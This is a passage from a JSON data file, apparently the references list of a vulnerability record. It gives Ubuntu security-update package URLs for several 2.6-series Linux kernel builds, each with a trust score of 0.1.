        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
